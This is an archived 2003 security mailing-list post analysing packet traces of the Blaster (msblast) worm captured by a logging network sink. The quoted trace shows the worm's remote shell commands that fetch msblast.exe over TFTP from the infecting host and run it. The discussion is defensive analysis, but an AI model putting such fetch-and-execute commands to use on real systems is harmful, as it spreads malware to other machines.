Lovsan packet traces (was: Re: [Dshield] infocon: yellow)

John Sage jsage at finchhaven.com
Tue Aug 12 15:31:48 GMT 2003


On Tue, Aug 12, 2003 at 12:31:56AM -0400, David Kennedy CISSP wrote:
> At 04:37 PM 8/11/03 -0700, John Sage wrote:
> 
> >T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
> >  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
> >  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
> >  74 2e 65 78 65 0a                                     t.exe.          
> >#
> >T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
> >#
> >T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
> >  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
> >  65 0a                                                 e.              
> >exit
> 
> 
> Hmmm...has anyone else got a trace to look at?  The various analyses say
> that the victim fetches the executable from the attacker via TFTP (which
> uses UDP), and some say the worm installs a TFTP server on the attacker to
> serve up the executable.  But that's not in this trace.  This looks like
> command channel traffic to do the GET but it appears to me to be
> attacker:ephemeral vis-a-vis victim:4444.  Where's the port 69 UDP traffic?
>  *Is* there port 69 UDP traffic?

I wouldn't expect to see UDP:69 traffic in my setup because what I've
got is not an infected host, but rather a network data-sink sort of
thing that just accepts any packets sent to it and discards them, all
the while snort is logging the packet contents...


- John
-- 
"Obviously, we do not want to leave zombies around."




More information about the list mailing list